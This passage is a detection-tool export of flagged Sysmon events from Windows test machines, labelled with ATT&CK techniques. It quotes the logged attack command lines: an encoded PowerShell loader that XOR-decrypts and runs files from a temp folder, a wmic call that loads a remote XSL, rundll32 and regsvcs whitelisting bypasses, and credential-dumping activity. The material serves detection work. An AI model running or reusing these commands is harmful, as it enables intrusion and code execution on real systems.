JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1," 1 5 4 1 0 0x8000000000000000 5875 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:28:42.700 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-3251-5CEB-0000-00109E06E100 748 C:\Windows\System32\inetsrv\w3wp.exe c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243544 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.077 747F3D96-9F69-5E75-0000-0010476F2000 7836 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16507 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:09:02.275 365ABB72-532E-5CD8-0000-00106C222700 1528 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-516B-5CD8-0000-001087E41600 3788 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243544 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.077 747F3D96-9F69-5E75-0000-0010476F2000 7836 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16507 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:09:02.275 365ABB72-532E-5CD8-0000-00106C222700 1528 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-516B-5CD8-0000-001087E41600 3788 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4920 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:28.893 747F3D96-6628-5D3F-0000-0010349B8800 6552 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 19 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:13.309 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\samlib.dll 6.1.7601.23677 (win7sp1_ldr.170209-0600) SAM Library DLL Microsoft® Windows® Operating System Microsoft Corporation SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 19 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 16:58:13.309 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\samlib.dll 6.1.7601.23677 (win7sp1_ldr.170209-0600) SAM Library DLL Microsoft® Windows® Operating System Microsoft Corporation SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1," 1 5 4 1 0 0x8000000000000000 6594 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1059,technique_name=Command-Line Interface 2019-04-27 15:57:53.806 365ABB72-7C01-5CC4-0000-00105C5C0C00 3076 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /A C:\Users\IEUser\AppData\Roaming\ IEWIN7\IEUser 365ABB72-7AB1-5CC4-0000-0020BEF40000 0xf4be 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-7C01-5CC4-0000-0010F9530C00 2992 C:\Users\IEUser\AppData\Roaming\NvSmart.exe "C:\Users\IEUser\AppData\Roaming\NvSmart.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5925 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.392 365ABB72-3D6E-5CEB-0000-00100C96FF00 3136 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 1025 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-23 17:45:34.528 365ABB72-DC3E-5CE6-0000-00102BC97200 712 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-CE6C-5CE6-0000-002047F30000 0xf347 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-CE6D-5CE6-0000-00109E190100 1472 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 896 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-23 16:49:08.258 365ABB72-CF04-5CE6-0000-001010F20C00 4056 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" c:\ IEWIN7\IEUser 365ABB72-CE6C-5CE6-0000-002047F30000 0xf347 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-CF01-5CE6-0000-00105DA50C00 3872 C:\Windows\System32\wbem\WMIC.exe wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4919 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:28.756 747F3D96-6628-5D3F-0000-0010B1968800 5708 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High 